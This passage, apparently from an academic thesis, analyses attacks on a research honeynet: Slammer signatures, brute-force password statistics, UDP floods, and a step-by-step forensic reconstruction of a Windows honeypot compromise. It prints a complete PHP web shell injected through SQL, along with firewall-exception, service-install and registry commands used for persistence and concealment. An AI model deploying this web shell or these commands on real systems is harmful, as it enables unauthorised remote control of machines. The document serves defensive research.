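SLAMMER_MARKERS = (b"dllhel32hkernQhounthickChGetTf", b"toQhsend")
# UDP port of the SQL Server Resolution Service targeted by the worm
# (assumption: taken from public advisories, not stated in this section).
SLAMMER_PORT = 1434


def looks_like_slammer(payload, dst_port):
    """Return True if a UDP payload matches the simple string fingerprint."""
    if dst_port != SLAMMER_PORT:
        return False
    return all(marker in payload for marker in SLAMMER_MARKERS)


# Synthetic payload for demonstration only; it merely embeds the markers.
synthetic = b"\x04" + b"\x01" * 96 + b"h.dllhel32hkernQhounthickChGetTf" + b"...toQhsend"
print(looks_like_slammer(synthetic, 1434))
print(looks_like_slammer(b"harmless datagram", 1434))
```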
5.2.2.4 Password Brute Force and Dictionary Attacks
Throughout the entire observation period, our honeypots were constantly hit by automatic brute force or dictionary attacks, i.e., intruders tested a large number of username
and password combinations in order to find valid authentication credentials for specific
system services and applications such as the secure shell server or the phpMyAdmin
database administration program. As indicated in Figure 5.13, the attacking machines
were spread over five continents. Many probes originated from Western European countries, e.g., France (66,457 attacks) or Sweden (61,247 attacks). However, certain geographic areas of the eastern hemisphere were significantly involved in the incidents
as well. For example, more than 24,000 password checks were detected from cities in
Australia, and more than 17,000 login attempts were traced to Hong Kong.
24 see http://www.icir.org/christian/honeycomb/
Figure 5.13: Origins of Password Brute Force Attacks
With the help of the trojaned program routines that we had implemented in our
system services, we were able to intercept the individual authentication credentials in
the clear before they were encrypted (cmp. Section 5.1.3.1). In sum, we captured almost
295,000 passwords. After analyzing the data in more detail, we generated a dictionary
of about 65,000 unique words. This dictionary may help users assess the quality of their
own credentials, because any entry in the list must be regarded as insufficiently strong
and reflects a security weakness. The top 30 passwords that we recorded are shown
in Table 5.5. As can be seen, password tests included single letters, words, strings
concatenated according to the keyboard layout (e.g., asdfgh), sequences of numbers,
and variations of these categories (e.g., test123). Furthermore, names of persons, swear
words, and derogatory expressions were also frequently chosen. It is also noteworthy
that, on average, in three out of 100 attacks, blackhats tried to completely circumvent
the authentication procedure and did not specify any password.
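The processing steps described above (ranking passwords, building a dictionary of unique words, and determining the share of attempts without a password) can be sketched as follows. The function name and the short sample list are assumptions for illustration; the sample is not an excerpt of the captured data.

```python
from collections import Counter


def summarize_passwords(attempts, top_n=30):
    """Return (top passwords, sorted unique dictionary, share of empty passwords)."""
    total = len(attempts)
    empty_share = attempts.count("") / total if total else 0.0
    counts = Counter(p for p in attempts if p)  # ignore empty passwords for ranking
    dictionary = sorted(counts)                 # unique non-empty passwords
    return counts.most_common(top_n), dictionary, empty_share


# Small made-up sample of intercepted password attempts.
SAMPLE_ATTEMPTS = ["123456", "123456", "root", "", "test", "123456", "root"]

top, dictionary, empty_share = summarize_passwords(SAMPLE_ATTEMPTS, top_n=2)
print(top)
print(dictionary)
print(round(empty_share, 3))
```

A user could check a candidate password against such a dictionary with a simple membership test; any hit indicates a credential that attackers are already guessing.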
The majority of intruders sought to compromise the root superuser account of the operating system or the database management application, respectively (see Figure 5.14).
In 24% of all cases, a non-privileged user or a non-privileged system account such as
ftp or www was targeted. These accounts are often only weakly protected (cmp. Klein,
1990). After a successful breach, the attacker is possibly able to escalate her privileges
(see Honeynet Project, 2004b). Therefore, these types of incidents must be regarded as
a severe threat, too.
What is quite surprising though is the fact that more than 28,000 times, adversaries
attempted to log in as admin or administrator. Considering that, by default, these
two usernames are usually undefined for both the SSH server and the phpMyAdmin application, the attacks were doomed to fail and suggest rather little technical
understanding.
 #   Password     #   Password     #   Password
 1   123456      11   roo         21   oracle
 2   123         12   !@          22   passwd
 3   1234        13   abc123      23   1q2
 4   password    14   qwerty      24   1q2w3e
 5   12345       15   abc         25   12345678
 6   test        16   changeme    26   mysql
 7   admin       17   adm         27   1234567
 8   a           18   user        28   test123
 9   root        19   master      29   guest
10   1           20   p           30   asdfgh
Table 5.5: Top 30 Passwords Used During Brute Force Attacks
Figure 5.14: User Accounts Targeted By Password Brute Force Attacks
5.2.2.5 Distributed Denial of Service Attacks
In addition to the incidents outlined above, our honeynet was also struck by so-called
Distributed Denial of Service (DDoS) attacks. One approach to carry out such an attack
is to flood the target system with a huge number of network packets (see Peng et al.,
2007). Thereby, its resources such as memory or processing time are exhausted, and
incoming requests cannot be properly processed any longer. As a result, the performance
level is degraded, the server gets unresponsive, and may even crash (see also Handley
and Rescorla, 2006; CERT, 2001c).
To successfully take the victim off the Internet, the adversary abuses several machines
under her control. At a certain point of time, these machines are commanded to start
a coordinated packet storm. A schematic overview of this procedure is illustrated in
Figure 5.15; a more detailed explanation is given by Mölsä (2005).
As Peng et al. (2007) point out, typically either the TCP, ICMP, or UDP network
protocols are used as transport mechanisms for these operations. In our case, we have
observed four UDP-based DDoS attacks on one decoy. On the respective days, UDP
traffic dramatically increased as can be seen in Figure 5.16. The timeline for an attack is
Figure 5.15: Schematic Overview of a Distributed Denial of Service Attack
(Source: Based on Criscuolo, 2000)
shown in Figure 5.17. In the first 17 hours prior to the incident, we measured an overall
sum of 85 packets only. At the beginning of the attack at 5:03 p.m., this figure suddenly
jumped to more than 400,000 packets. For two hours, we monitored between 100,000
and 800,000 packets per minute going to our honeypot. At the end of the DDoS attempt,
UDP packet rates quickly decreased, and only 36 further packets were captured in the
remaining hours of the day. In total, almost 82 million packets were sent to our machine
during the four attacks. 22 systems from 8 countries were involved in the incidents. A
summary of the results is shown in Table 5.6.
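Since these packet storms were not reported by the intrusion detection system, a simple rate check on the captured traffic is a useful complement. The sketch below groups packet timestamps into one-minute buckets and reports the minutes in which a threshold is reached. The default of 100,000 packets per minute mirrors the lower bound observed during the attacks; the function name, the choice of threshold, and the toy timestamps are assumptions for illustration.

```python
from collections import Counter


def flood_minutes(timestamps, threshold=100_000):
    """Return the sorted minute indices whose packet count reaches the threshold.

    timestamps: iterable of packet arrival times in seconds (e.g. Unix time).
    """
    per_minute = Counter(int(ts) // 60 for ts in timestamps)
    return sorted(minute for minute, count in per_minute.items() if count >= threshold)


# Toy data: three packets in minute 0, four in minute 1, one in minute 2.
toy_timestamps = [0, 1.5, 2, 61, 62, 63, 64, 130]
print(flood_minutes(toy_timestamps, threshold=3))
```

Multiplying a returned minute index by 60 yields the start of that minute in the same time base as the input, which makes it easy to relate the result to a timeline such as the one in Figure 5.17.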
The majority of packets solely contained the single-byte character 0x30 and targeted
arbitrary ports of our system (see Figure 5.18). Accessing random ports on the machine
of the victim is an efficient flooding technique (cmp. Criscuolo, 2000): In many cases,
the port in question is likely to be closed. Consequently, in compliance with Postel
(1981a), the operating system generates an ICMP Destination Unreachable notification
message that is returned to the sender. In sum, these messages act as further amplifiers
for the attack and possibly affect other machines on the network as well. Criscuolo
(2000, p. 14) concludes: “If enough UDP packets are sent to dead ports on the target
host, not only will the target host go down, but computers on the same segment will
also be disabled because of the amount of traffic”. Luckily, all outbound messages were
successfully blocked by the Honeywall to mitigate risks as best as possible.
Figure 5.16: Number of UDP Packets Captured per Day in the Honeynet
Country          Number of Systems   Number of Packets Sent
United States    6                   37,932,042
Thailand         5                   21,217,361
Mexico           3                   14,024,735
India            3                    4,527,677
South Korea      2                    3,828,526
France           1                      160,622
United Kingdom   1                      110,566
Japan            1                       83,755
Table 5.6: Countries Involved in Different Distributed Denial of Service Attacks
In about 16% of the captured data samples, we extracted larger payloads up to 50 bytes
that were destined for the two UDP ports 22 and 80. We were unable to determine why
specifically these ports were flooded though.
Mirkovic and Reiher (2004) and Chang (2002) have identified several motives for
DDoS attempts, e.g., inflicting damage on business competitors due to monetary reasons.
However, these motives are not sufficiently applicable to our honeynet architecture.
Therefore, why our decoy was attacked remains speculative in the end.
Figure 5.17: Timeline of a UDP Packet Storm on a Honeypot
Figure 5.18: Analysis of a UDP Packet Storm
5.3 Selected Attacks on the Honeynet
In the following, we present two attacks on our honeypots in detail. We illustrate the
tools and tactics that were of great help during the intrusion and try to explain why
the systems were targeted and what they were used for once they had been penetrated.
5.3.1 Attack on the Microsoft Windows Honeypot
Our Microsoft Windows-based honeypot was successfully compromised less than 24 hours
after we had connected the decoy to the Internet. A summary of the attack sequence
is presented below, followed by an evaluation of the incident. A basic personal
profile and a taxonomy of the intruder are the subject of Sections 5.3.1.3 and 5.3.1.4.
5.3.1.1 Sequence of the Attack
On February 28 at 7:44:59 p.m., the phpMyAdmin database administration program is
opened over the HTTP protocol by an adversary with the IP address 87.230.xxx.xxx.
Due to improper configuration settings, the application is fully accessible over the Internet as we have stated in Section 5.1.1. Consequently, the individual components are
prone to manipulation, including the mysql main database that saves sensitive information such as usernames and passwords. However, the blackhat does not take notice of
the data but begins to import a prepared SQL (Structured Query Language) script that
is printed in Listing 5.4. When it is executed, a basic file upload utility is created in the
root directory of the server that also permits running arbitrary commands on the host.
To perform said operations, a temporary database table needs to be generated (see
Line 1). It is deleted with the help of the drop instruction at the end of the script to
erase the traces of the intrusion.
Although the techniques described above are quite simple, they clearly demonstrate
how a misconfigured database management system may easily put the underlying platform at risk.
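From a defender's point of view, the decisive step of the script is the statement that writes the table contents to a file inside the web server directory. The following sketch scans logged SQL text for statements that export data to a file with a script extension. The function name and the list of extensions are assumptions for this illustration, and the pattern only covers single-quoted paths, so it is a heuristic rather than a complete detector.

```python
import re

# "... INTO OUTFILE '<path>'" or "... INTO DUMPFILE '<path>'"
OUTFILE_RE = re.compile(
    r"\bINTO\s+(?:OUTFILE|DUMPFILE)\s+'(?P<path>[^']+)'", re.IGNORECASE
)
# Extensions that a web server might execute (assumed list, adjust as needed).
SCRIPT_EXTENSIONS = (".php", ".phtml", ".asp", ".jsp")


def suspicious_outfile_targets(sql_text):
    """Return the target paths of file exports that end in a script extension."""
    return [
        match.group("path")
        for match in OUTFILE_RE.finditer(sql_text)
        if match.group("path").lower().endswith(SCRIPT_EXTENSIONS)
    ]


logged_sql = (
    "select * from dblog into outfile 'C:/xampp/phpMyAdmin/db_log.php';\n"
    "SELECT id FROM report INTO OUTFILE '/tmp/report.csv';"
)
print(suspicious_outfile_targets(logged_sql))
```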
At 7:47:31 p.m., the attacker starts downloading a number of tools after briefly checking the configuration of the network interface card. Using the rcp command which is
part of the operating system, a remote connection with the IP address 85.176.xxx.xxx is
established, and a file mo.php is transferred to the target machine. This file is recognized
as a variant of the c99 shell, a trojan backdoor that is written in the PHP programming
language. As can be seen in Figure 5.19, the trojan comprises a powerful graphical interface that offers many features, including browsing through the entire directory hierarchy,
editing or deleting contents, and executing commands.
    create table dblog (text text);

    insert into dblog set text = '
    <? $sendfile = $_REQUEST["sendfile"]; $cmd = $_REQUEST["-cmd"];

    if ($sendfile == "true") {
      $fn = $_FILES["file"]["name"];
      $tn = $_FILES["file"]["tmp_name"];

      if (move_uploaded_file($tn, dirname(__FILE__) . "/" . $fn))
        $result = "<br><font color=green>upload done</p>";
      else
        $result = "<br><font color=red>upload failed</p>";
    }
    ?>

    <html><body>
    <form method=POST>
    <input type=TEXT name="-cmd" size=64 value="<?=$cmd?>">
    </form>
    <form enctype="multipart/form-data" method="post" action="">
    <input type=file name=file size=20>
    <input type="submit" value="Upload">
    <input type="hidden" name="sendfile" value="true"> <?=$result?>
    </form>
    <pre><? if ($cmd != "") echo shell_exec($cmd);?></pre>
    </body></html>';

    select * from dblog into outfile 'C:/xampp/phpMyAdmin/db_log.php';
    DROP TABLE `dblog`;
    FLUSH LOGS;
Listing 5.4: Manipulation of the System Database
Apart from the c99 shell, two additional files are copied to the honeypot, namely
secure.old and secure.exe. The latter is identified as the Serv-U file transfer server
by Rhino Software25 . The program can be silently installed and invoked on the command
line and therefore enjoys a questionable reputation in the underground community (see
Rhino Software, 2004; Baldwin, 2002a). The other file, secure.old, contains initialization instructions as well as a list of pre-defined account names that may be used to
log in to the server.
After all operations are completed, the attacker quickly verifies that the two components have been successfully transferred to the decoy by running the dir command and
listing the contents of the root directory. With the help of the PHP shell, the Serv-U FTP
server is installed as a system service in the next step (see Listing 5.5). Furthermore, an
exception is added to the local firewall rules to avoid traffic filtering and allow incoming
25 see http://www.serv-u.com/
Figure 5.19: User Interface of the c99 shell Trojan Backdoor
requests. Finally, the service is started with the net start command and is bound
to six different network ports. Again, the intruder attempts to disguise her activities
by choosing several well-known ports, e.g., port 53 that is registered for DNS (Domain
Name System) lookups (see Internet Assigned Numbers Authority (IANA), 2008).
At 7:51:45 p.m., a first FTP session is initiated, and a small-sized binary bw1.exe is
stored on the decoy. The program is capable of measuring the bandwidth of the Internet
connection. For this purpose, a sample file must be repeatedly retrieved. In our case,
the Service Pack 3 for Microsoft Windows 2000 is downloaded 10 times. In total, more
than 1.25 GB of data are sent to our machine during this process.
At the end of the speed test, the attacker saves an audio file to the special directory
System Volume Information on the primary partition of the hard disk. This directory
usually contains information about certain system restore points and cannot be accessed
at runtime by default (see Russinovich and Solomon, 2004). The restrictions only apply to the local computer though and can be circumvented through the external FTP
communication. Under normal circumstances, the actions of the intruder would thus be
hidden from the eyes of legitimate users.
    # the attacker installs the Serv-U FTP server as a system service
    secure.exe /i

    # an exception is added to the local firewall rules
    netsh firewall add allowedprogram C:\xampp\phpMyAdmin\secure.exe ftp ENABLE

    # the system service is finally started
    net start secure
Listing 5.5: Installation of the Serv-U FTP Server
    @echo off

    ...

    # store the new values in the helper file C:\hide.reg
    echo Windows Registry Editor Version 5.00 > c:\hide.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >> c:\hide.reg
    echo "AllowTSConnections"=dword:00000001 >> c:\hide.reg

    # import the values to the system registry
    REGEDIT /S c:\hide.REG

    # delete the helper file
    DEL /Q c:\hide.REG

    ...
Listing 5.6: Modification of the System Registry
In the following two hours, several further tools are stored on the honeypot to stay in
control of the machine and conceal the incident. First, the adversary uploads a batch
file ts.bat that modifies certain values in the system registry in order to enable the
Microsoft Terminal Service. An extract of the file is shown in Listing 5.6. With the help
of the service, it is possible to administrate the operating system over the network.
At 8:10:25 p.m., the attacker copies a different variant of the c99 trojan backdoor to the
root directory of the phpMyAdmin web application that serves as a replacement for the
original PHP shell. The file is disguised as tbl_index.php. What is more interesting,
the source code of the trojan is obfuscated, i.e., it is made illegible by encoding all
embedded strings, variables, and programming instructions. Thus, reverse engineering
of the program is significantly more difficult, and antivirus scanners as well as malware
removal utilities may possibly be bypassed.
    del \sql.php /S /Q /F >> Found.txt
    del \server_variables.php /S /Q /F >> Found.txt
    del \read_dump.php /S /Q /F >> Found.txt
    del \import.php /S /Q /F >> Found.txt
    del \server_privileges.php /S /Q /F >> Found.txt
    del \tbl_replace.php /S /Q /F >> Found.txt
    del \phpinfo.php /S /Q /F >> Found.txt
    del \main.php /S /Q /F >> Found.txt
    del 1.bat
Listing 5.7: System Hardening Operations on the Compromised Honeypot
The intruder also deletes several software modules of phpMyAdmin by running another
batch file, 1.bat, which is transferred to the decoy (see Listing 5.7). On the one hand,
these actions severely damage the application so it cannot be executed any longer. On
the other hand, the entry point to the system is closed, and related attacks are effectively
prevented.
As indicated in Listing 5.7, the result of each delete operation is appended to the
temporary file Found.txt to make sure the machine has been successfully hardened.
This file is downloaded at a later point of time.
At 8:12:23 p.m., the attacker starts covering her tracks and erases a number of programs that are not needed any more, including the original c99 shell. In the last step,
various supplemental components for the Serv-U daemon are copied to a subfolder in the
Windows system directory before the FTP session is terminated. The individual components are listed in Table 5.7 and are required to install another version of the Serv-U
FTP server. The application is disguised as a DNS server and supports encrypted data
transfers.
File              MD5 Checksum                       Description
a.bat             4a8786fffb14bb8facf288f3cffcf42e   Batch script that is executed to install a disguised version of the Serv-U FTP server with support for encrypted data transfers.
Dnslib32api.cat   1c0aacaf30b92277cfe55af07c200cfc   Auxiliary file for the disguised FTP server.
Dnstts.exe        cfe9801298579cd93e340d4cb84af8fd   Main executable of the disguised Serv-U daemon.
libeay32.dll,     cfe9801298579cd93e340d4cb84af8fd   Dynamic libraries that provide cryptographic functions in order to establish a secured connection.
ssleay32.dll      d18bcf48a7624154745c0526cc8576f3
ServUCert.crt,    7b8fa286633f087b2faf9a9584dcc72a   Security certificate and private key of the FTP server that are needed to initiate an encrypted session.
ServUCert.key     2293486183632e8634aa30a1798bc5e7
Table 5.7: Additional Components of the Serv-U FTP Server
that are Required to Establish a Secured Connection
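Checksums such as those in Table 5.7 make it possible to recognize the same files on other systems. The sketch below computes the MD5 digest of a file-like object and compares it with a known value. The function names are assumptions for illustration, and only three entries of the table are reproduced; MD5 is used solely because the table lists MD5 values, not because it is recommended for new work.

```python
import hashlib
import io

# Subset of the checksums listed in Table 5.7.
KNOWN_MD5 = {
    "a.bat": "4a8786fffb14bb8facf288f3cffcf42e",
    "Dnslib32api.cat": "1c0aacaf30b92277cfe55af07c200cfc",
    "ssleay32.dll": "d18bcf48a7624154745c0526cc8576f3",
}


def md5_of_stream(stream, chunk_size=65536):
    """Return the hexadecimal MD5 digest of a binary file-like object."""
    digest = hashlib.md5()
    for chunk in iter(lambda: stream.read(chunk_size), b""):
        digest.update(chunk)
    return digest.hexdigest()


def matches_known(name, stream):
    """Return True if the stream's digest equals the listed checksum for name."""
    expected = KNOWN_MD5.get(name)
    return expected is not None and md5_of_stream(stream) == expected


print(md5_of_stream(io.BytesIO(b"abc")))
print(matches_known("a.bat", io.BytesIO(b"not the real file")))
```

For files on disk, the stream would be obtained with open(path, "rb").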
Three minutes later, at 8:15:24 p.m., such a secured channel is established with the
server. Due to the use of strong encryption algorithms, examining the corresponding
traffic flows would usually be infeasible at this point. In our case though, we are in
possession of the private key of the server which is needed to decipher the network
packets. Unfortunately, the key is protected with an unknown pass phrase and, thus,
cannot be processed directly. To find the pass phrase, we run the strings utility which is
included in most Linux distributions and extract all text patterns that are referenced by
the server. After a short inspection of the results, we are lucky and succeed in generating
a new, unencrypted private key by executing the free OpenSSL cryptography toolkit26
as follows (cmp. OpenSSL Project, 2003):
    openssl rsa -passin pass:[pass phrase] -in ServUCert.key -out ServUCert-Unencrypted.key
In the next step, the new key can be imported into the Wireshark network analyzer
as explained by Garland (2008). The captured data are then automatically decrypted
as indicated in the lower right corner of Figure 5.20. As a consequence, we are able to
recover the activities of the intruder and proceed with our investigation.
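The search for the pass phrase relies on the fact that it is embedded in the server binary as readable text. What the strings utility does can be approximated in a few lines, as in the following sketch, which extracts runs of printable ASCII characters from binary data. The function name and the sample bytes are assumptions for illustration; the sample does not contain the actual pass phrase.

```python
import re


def printable_strings(data, min_len=4):
    """Return all runs of at least min_len printable ASCII characters in data."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [match.group().decode("ascii") for match in pattern.finditer(data)]


# Made-up binary fragment with two embedded text patterns.
sample_blob = b"\x00\x01example-phrase\x00ab\x00ServUCert.key\xff"
print(printable_strings(sample_blob))
```

Each extracted string is a candidate that can be tried with the openssl command shown above until the private key is decrypted successfully.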
Analyzing the secured session: Feeling protected by the encrypted communication
channel, the adversary starts uploading a number of further utilities at 8:15:54 p.m.:
The script install.cmd sets up a new system service lsasvc.exe which is identified as
the Hacker Defender rootkit, version 1.0. The rootkit is capable of hiding specific files,
processes, system registry keys, and network ports that are defined in a corresponding
initialization file. In our case, all traces of the attack tools are removed. For instance, the
newly installed FTP and DNS servers are excluded from the process list (see Figure 5.21).
What is quite peculiar is the fact that various legitimate system components such as
the service management screen or the Windows firewall are disabled during this process,
too. On the one hand, the attacker thereby makes sure the original state of the compromised
machine cannot be easily restored. On the other hand, these types of system
manipulations are extremely conspicuous and are likely to be detected by any system
administrator.
[26] see http://www.openssl.org/
Figure 5.20: Analyzing Encrypted Network Traffic with Wireshark
In addition to the rootkit, the intruder saves three dynamic libraries to a subfolder
in the installation directory of the operating system. These libraries provide auxiliary
functions for the Serv-U FTP server, e.g., to retrieve summary reports about the number
of users that are currently logged in or to calculate the total amount of data that were
transferred in the course of an FTP session. Furthermore, they make it possible to display personal
messages or logos when a connection has been successfully established. Although this
seems to be a rather minor feature, custom login banners are frequently used by blackhats
to “advertise” their name, greet competing groups, and gain social status in the underground community (cmp. Honeynet Project, 2004b; Craig and Burnett, 2005; Rogers,
2000b). An example of such a banner that we captured on our honeypot is presented in
Figure 5.22.
Figure 5.21: Subversion of a System With the Hacker Defender Rootkit
(a) Running processes on the system before the rootkit is executed.
(b) After the rootkit has been installed, specific processes are removed from the process list.
After all operations are completed, the adversary invokes an internal site maintenance
interface multiple times to check the functionality of the server. With the help of this
interface, it is possible to adapt core configurational settings of the service over a remote
connection such as changing the network ports the application is bound to.
In the last step, the adversary logs in as the alternative user fill0r, uploads an audio file
as well as the first part of a pirated DVD to a subdirectory of the xampp distribution, and
rechecks the status of the FTP server. The connection is finally closed at 9:54:27 p.m.
At this point, we decide to shut down our honeypot and start analyzing the compromise.
The individual tools that were used for the penetration are summarized in chronological
order in Table 5.8; a timeline for the entire attack sequence is illustrated in Figure 5.23.
Figure 5.22: Custom Login Banner of the Attacker
| Attack Tool | MD5 Checksum | Description |
|---|---|---|
| db_log.php | 72527be487571260838fa8ada207ca46 | Basic file upload and command execution utility that is used by the intruder to retrieve additional attack tools. |
| mo.php | 34e47e3d7711889e4abe5d64d153eda2 | PHP-based trojan backdoor c99 shell that comprises a significant amount of file as well as system manipulation functions. The shell is run to install a number of system services, including the FTP server described below. |
| secure.exe, secure.old | e7c177b23210819b4a9087343351e045, b7b4cce7b902a9c735c27c9b22054c56 | Server component and initialization file of the Serv-U FTP Server. With the help of the server, further utilities are transferred to the honeypot. |
| bw1.exe | 31924ef0ae98f9cf7884d41d91499751 | Speed test utility that measures the bandwidth of the Internet connection. Thereby, the adversary is able to assess the value of the compromised machine. |
| ts.bat | 64f1bb47710b59ccc03efa1c09d355c3 | Batch script that enables the Microsoft Terminal Service in order to provide the intruder with a graphical remote user interface. |
| tbl_index.php | 4959954f89270ef01979029d180ee3c5 | Obfuscated version of the c99 shell which is set up to maintain access to the system. |
| 1.bat | 6a48b5bfa1a60f4620077acd253ba245 | Batch script that deletes various core components of the phpMyAdmin database management system to harden the machine against further attacks. |
| install.cmd, lsasvc.exe, lsasvc.ini | 906590f18a9065b055d52f779e1dc220, 29d6dfbb62cb51674f4b6d00976e5288, 68b19fe27a6aea5519f2519a6ee3658a | Setup and program files of the Hacker Defender rootkit. The rootkit subverts the operating system and helps conceal the incident. |
| on.dll, off.dll, dir.dll | 4b61fae8269e6875189b681446a645c0, 7f538611e5ee85211a1a979d2dd94a5b, 2012dd7c39441d80a684ed4d45f07c0f | Supplemental files for the Serv-U FTP server that provide auxiliary functions, e.g., displaying custom banners or status information about the service. |

Table 5.8: Attack Tools Used During the Compromise of the Windows Honeypot
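Checksums such as those listed in Table 5.8 can be computed with a few lines of Python. The following is a minimal sketch, assuming the captured files are available on the analysis machine; the helper name md5_of_file and the chunk size are hypothetical choices for this example.

```python
import hashlib


def md5_of_file(path: str, chunk_size: int = 65536) -> str:
    """Compute the MD5 checksum of a file without loading it into memory at once."""
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        # Read the file in fixed-size chunks until an empty chunk signals EOF.
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()
```

Reading in chunks keeps memory usage constant, which is convenient for larger captures such as archives or disk images.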
Figure 5.23: Timeline of the Attack on the Windows Honeypot
5.3.1.2 Evaluation of the Attack
Due to a poorly configured instance of the phpMyAdmin database administration program, the attacker is able to easily gain administrative privileges and upload her own
tools. These tools include a trojan backdoor that permits manipulating the entire machine over the Internet as well as a rootkit that is capable of subverting the operating
system in order to conceal the incident. In the next step, the intruder sets up a file
transfer server and begins to store several audio and video files. We assume these files
are to be made available for software pirates. This assumption is based on the following
findings: First, the FTP server is configured to grant access to numerous users, e.g.,
to the user fill0r, but also to various so-called leeches. A fill0r [27] is responsible for “filling” an exploited host with applications, movies, or other types of media, while leeches
typically consume the stored material only and do not share their own contents (see
“B-Bstf” Smith, 2004). Second, the server keeps track of the data that is transferred
to and from the decoy and displays detailed usage statistics. Third and last, users are
explicitly invited to “squeeze out every bit” of the machine [28].
Taking the different aspects into consideration, we expect our honeypot to be turned
into a so-called public stro (or pubstro in short), i.e., a compromised high-capacity public
server that is misused to distribute illegal copies of copyright-protected goods (see “B-Bstf” Smith, 2004, p. 29). In many cases, such a pubstro is integrated into a larger
network of similarly penetrated systems and is run by participants of a special Internet
subgroup which is known as the warez scene (see Sen and Krömer, 2008; Craig and
Burnett, 2005). For this reason, it is beneficial to analyze the incident not only with
regard to the intruder, but also with respect to said subgroup. Thereby, we can possibly
assess the intentions and motives of the adversary more accurately and create a more
detailed profile of her personality.
5.3.1.3 Profile of the Attacker
Based on the pieces of evidence we collected on the compromised decoy, we are able to
draw conclusions about the presumable origin and technical expertise of the attacker.
An evaluation of the latter characteristic, in particular, can greatly facilitate a broad classification of the intruder (cmp. Rogers, 2000a; Hollinger, 1988). For a more reasonable
taxonomy, however, we need to take motivation-related factors into account as well (cmp.
Chantler, 1995; Rogers, 2005). These factors can be grouped into six categories that are
outlined in the second half of this section.
[27] Note: This is a jargon word for “filler”. Substituting numbers for letters is common in certain
subgroups of the Internet community and known as leetspeak. For more information, please refer to
Raymond (2003).
[28] Note: This is a figurative translation of the greeting message of the captured login banner.
Presumable origin of the attacker: Surprisingly, only two systems are used by the
blackhat during the intrusion to gain access to our honeypot. The respective hosts with
the IP addresses 87.230.xxx.xxx and 85.176.xxx.xxx are traced to two different German
Internet service providers (ISPs). A number of further indications also suggest that the
intruder is likely to originate from Germany. For instance, both the greeting message
that is displayed when logging in to the Serv-U FTP server and several passwords
that we intercepted at the beginning of an FTP session are composed in German. The
user-agent strings that are transmitted by the attacking machine to our decoy each time
a web site is retrieved contain the German country code as shown in the extract of a
captured network packet below.
Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12
As can be seen, we are also able to identify the system platform of the adversary by
analyzing the different sections of the string (see also Mozilla Developer Center, 2009;
Microsoft Corporation, 2009, for an overview of the sections of the user-agent string).
In our case, the intruder uses a Microsoft Windows operating system and a recent version
of the Mozilla Firefox Internet browser.
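The individual sections of such a string can be separated mechanically. The following Python sketch assumes the Gecko-style layout of the captured string (product, platform, security level, operating system, locale, revision, Gecko build date, browser); the pattern and the field names are our own labels for this example and do not cover user-agent strings of other browsers.

```python
import re
from typing import Dict, Optional

# Assumed layout: Product (platform; security; os; locale; rv:revision) Gecko/date Browser
UA_PATTERN = re.compile(
    r"^(?P<product>\S+) \((?P<platform>[^;]+); (?P<security>[^;]+); "
    r"(?P<os>[^;]+); (?P<locale>[^;]+); rv:(?P<revision>[^)]+)\) "
    r"Gecko/(?P<gecko>\d+) (?P<browser>\S+)$"
)


def parse_gecko_user_agent(user_agent: str) -> Optional[Dict[str, str]]:
    """Split a Gecko-style user-agent string into named sections, or return None."""
    match = UA_PATTERN.match(user_agent)
    return match.groupdict() if match else None


if __name__ == "__main__":
    captured = ("Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) "
                "Gecko/20080201 Firefox/2.0.0.12")
    print(parse_gecko_user_agent(captured))
```

Since the client fully controls the string, the parsed values should be treated as hints rather than as reliable evidence.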
It is important to note though that these pieces of information are entirely under the control
of the client and, thus, may possibly be tampered with (see Andrews and Whittaker,
2006). Additionally, the individual IP addresses that are recorded during the incident
do not necessarily reflect the real origins of the attack either. As many authors point
out, attackers frequently abuse intermediary machines, so-called proxies, to cover their
tracks and circumvent prosecution (cmp. Honeynet Project, 2004b). Therefore, each
source of data must generally be regarded with great care. By combining and linking
the captured elements, however, we are able to draw a more complete picture and find
a solid foundation for our hypothesis.
Presumable expertise of the attacker: Within a period of slightly more than 15 minutes,
the blackhat exploits a vulnerability in one of our applications, penetrates the machine,
and sets up her own FTP server. Taking these step-by-step actions into account, we
conclude the intrusion has been well planned and prepared for. Furthermore, given that
the adversary is familiar with a number of attack tools and is quickly able to upload
a customized login banner, we have reason to believe she has already gained a certain
experience with similar system compromises. On the other hand, she does not seem to
fully understand the complexity of specific utilities, most importantly, the rootkit that is
installed on our decoy but which is quite poorly configured (cmp. Section 5.3.1.1). Some
operations are also carried out repetitively, e.g., the Serv-U daemon is added multiple
times to the exception list of the local firewall rules. It also remains unclear why two
variants of the same trojan backdoor are transferred to our honeypot. In summary,
even though the strategy and methods of the intruder are fairly efficient, we assume her
technical expertise and skills are rather low.
Presumable motivations of the attacker: As members of the Honeynet Project (2004b)
note, identifying the motivations of attackers is key to gaining a deep understanding
of their behavior. In turn, by observing the activities of intruders, we are able to
draw conclusions about their intentions and reveal inherent factors such as motives
and attitudes (see Fishbein and Ajzen, 1975; Ajzen, 1991, for an overview of the
interrelation between motivations, attitudes, and behavior).
With respect to computer crime, the social psychologist Max Kilger differentiates the
following six prevalent motivations that are subsumed under the acronym MEECES (see
Honeynet Project, 2004b, p. 509-520): money, entertainment, ego, cause (i.e., ideology),
entrance to social group, and status.
After examining the sequence of the attack, we did not find any evidence the incident
was monetary- or ideology-driven. Furthermore, considering the adversary attempted
to “keep a low profile” and made significant efforts to stay in control of the machine,
we feel the compromise was not carried out purely for entertainment purposes. On the
other hand, the fact that a personal logo was uploaded to our honeypot and the system
was being made available to multiple users indicate a certain desire for appreciation and
the need to rise in esteem as well as status. This observation is supported by Rogers
(2000b, p. 19): “The reinforcement derived from hacking may come from the increase in
knowledge, prestige within the hacking community, or the successful completion of the
puzzle (...)”. Consistently, Jordan and Taylor (1998, p. 768) argue that “peer recognition
from other hackers or friends is a reward and goal for many hackers, signifying acceptance
into the community and offering places in a hierarchy of more advanced hackers”.
To sum up, ego-, social-, and status-related elements apparently were the dominant
motivational drivers for the blackhat to penetrate our decoy, rather than monetary or
ideological factors.
5.3.1.4 Taxonomy and Classification of the Attacker
A number of authors emphasize that “hackers” do not form a homogeneous group, e.g.,
because of different social, personal, or technical backgrounds (cmp. Rogers, 2000b;
